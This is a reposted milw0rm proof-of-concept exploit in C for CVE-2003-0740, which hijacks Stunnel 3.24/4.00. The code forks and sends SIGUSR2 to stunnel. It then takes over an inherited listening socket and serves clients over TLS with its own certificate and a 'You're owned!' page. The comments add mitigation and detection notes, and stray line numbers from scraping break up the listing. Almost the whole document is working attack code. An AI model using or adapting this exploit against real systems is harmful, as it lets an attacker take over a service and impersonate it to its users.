FlyFar

Stunnel 3.24/4.00 - Daemon Hijacking - CVE-2003-0740

Mar 1st, 2024
  /*
   * Proof-of-concept configuration and shared state (CVE-2003-0740).
   *
   * LISTEN_DESCRIPTOR is the hard-coded descriptor number this program
   * treats as a listening socket inherited from its parent; presumably the
   * right value depends on the parent's descriptor table (verify per target
   * build).  Defensive takeaway: a daemon should mark its listening sockets
   * close-on-exec (FD_CLOEXEC) or close them before exec, so that programs
   * it spawns never receive them.
   */
  enum { LISTEN_DESCRIPTOR = 6 };

  /*
   * Certificate and private key are read from the same PEM file.  This is
   * the PoC's own credential, presumably not the one the real service
   * presents, so clients that verify the server certificate should be able
   * to notice the substitution.
   */
  #define CERTF "/opt/stunnel-sploit/foo-cert.pem"
  #define KEYF  "/opt/stunnel-sploit/foo-cert.pem"

  /* OpenSSL state shared between ssl_init() and server_loop(). */
  static SSL_METHOD *meth;         /* method table chosen in ssl_init() */
  static SSL_CTX    *ctx;          /* TLS context built in ssl_init() */
  static SSL        *ssl;          /* per-connection handle in server_loop() */
  static X509       *client_cert;  /* declared; not referenced in this listing */

  /* Forward declarations for the helpers defined after main(). */
  static void ssl_init(void);
  static void server_loop(int descr);
  12.  
  /*
   * Entry point of the CVE-2003-0740 proof-of-concept.
   *
   * Per the original comments, the program expects to be started by stunnel
   * and therefore to hold stunnel's open descriptors.  It forks; the
   * original process returns 0 at once (also when fork() fails), while the
   * child detaches into its own session, sends SIGUSR2 to the process that
   * launched it, closes stdin/stdout/stderr, and starts answering on the
   * inherited listening descriptor.
   *
   * Detection and mitigation notes: a non-stunnel process accepting
   * connections on the service port, or the daemon exiting on an unexpected
   * SIGUSR2, are the observable signs.  The fix is on the daemon side:
   * do not let the listening socket survive into spawned programs.
   */
  int main(int argc, char *argv[])
  {
      int parent = getppid();   /* captured before fork(): the launching process */

      /* Only the forked child continues; "so stunnel doesn't kill us". */
      if (fork() != 0)
          return 0;

      /* Become session leader, detached from the launcher's session. */
      setsid();

      /* Signal the launcher, then drop the three standard descriptors. */
      kill(parent, SIGUSR2);
      for (int std_fd = 0; std_fd <= 2; std_fd++)
          close(std_fd);

      ssl_init();
      server_loop(LISTEN_DESCRIPTOR);
      return 0;
  }
  30.  
  /*
   * Accept loop run on the inherited listening descriptor.
   *
   * For every accepted connection it performs a server-side TLS handshake
   * with the context prepared by ssl_init(), writes one fixed HTTP response,
   * and closes the connection.  A handshake that returns -1 terminates the
   * whole process with exit(1).  The loop has no exit condition, so the
   * SSL_CTX_free() at the end is never reached.
   *
   * descr: descriptor number of the listening socket to accept on.
   *
   * What this demonstrates for defenders: whoever holds a copy of the
   * listening socket can answer clients in the daemon's place, with a
   * certificate of their own choosing.
   */
  static void server_loop(int descr)
  {
      struct timeval tv;        /* declared in the original; never used */
      fd_set         read_mask;

      FD_SET(descr, &read_mask);
      for (;;) {
          struct sockaddr_in remote;
          socklen_t          len = sizeof(remote);
          int                fd;

          /* Null timeout: block until select() reports the descriptor. */
          if (select(descr + 1, &read_mask, NULL, NULL, 0) == -1)
              continue;

          fd = accept(descr, &remote, &len);
          if (fd < 0)
              continue;

          ssl = SSL_new(ctx);
          if (ssl != NULL) {
              char obuf[4096];

              SSL_set_fd(ssl, fd);
              SSL_set_accept_state(ssl);
              if (SSL_accept(ssl) == -1)
                  exit(1);

              /* Fixed response; the pieces are concatenated at compile time. */
              strcpy(obuf,
                     "HTTP/1.0 200 OK\n"
                     "Content-Length: 40\n"
                     "Content-Type: text/html\n\n"
                     "<html><body>You're owned!</body></html>");
              SSL_write(ssl, obuf, strlen(obuf));

              /* Mark both directions shut down, then release the handle. */
              SSL_set_shutdown(ssl, SSL_SENT_SHUTDOWN | SSL_RECEIVED_SHUTDOWN);
              SSL_free(ssl);
              ERR_remove_state(0);
          }
          close(fd);
      }
      SSL_CTX_free(ctx);  /* Never gets called */
  }
  71.  
  /*
   * Prepare the global OpenSSL server context used by server_loop().
   *
   * Loads error strings and algorithms, creates a context with the
   * SSLv23 server method, then loads the certificate (CERTF) and private
   * key (KEYF) from PEM files and checks that the two match.  Any failure
   * ends the process with exit(1); nothing is reported to the caller.
   */
  static void ssl_init(void)
  {
      SSL_load_error_strings();
      SSLeay_add_ssl_algorithms();

      meth = SSLv23_server_method();
      ctx  = SSL_CTX_new(meth);
      if (ctx == NULL)
          exit(1);

      /* Short-circuit keeps the original order: certificate, key, match. */
      if (SSL_CTX_use_certificate_file(ctx, CERTF, SSL_FILETYPE_PEM) <= 0 ||
          SSL_CTX_use_PrivateKey_file(ctx, KEYF, SSL_FILETYPE_PEM) <= 0 ||
          !SSL_CTX_check_private_key(ctx))
          exit(1);
  }
  89.  
  90.  
  91. // milw0rm.com [2003-09-05]
  92.            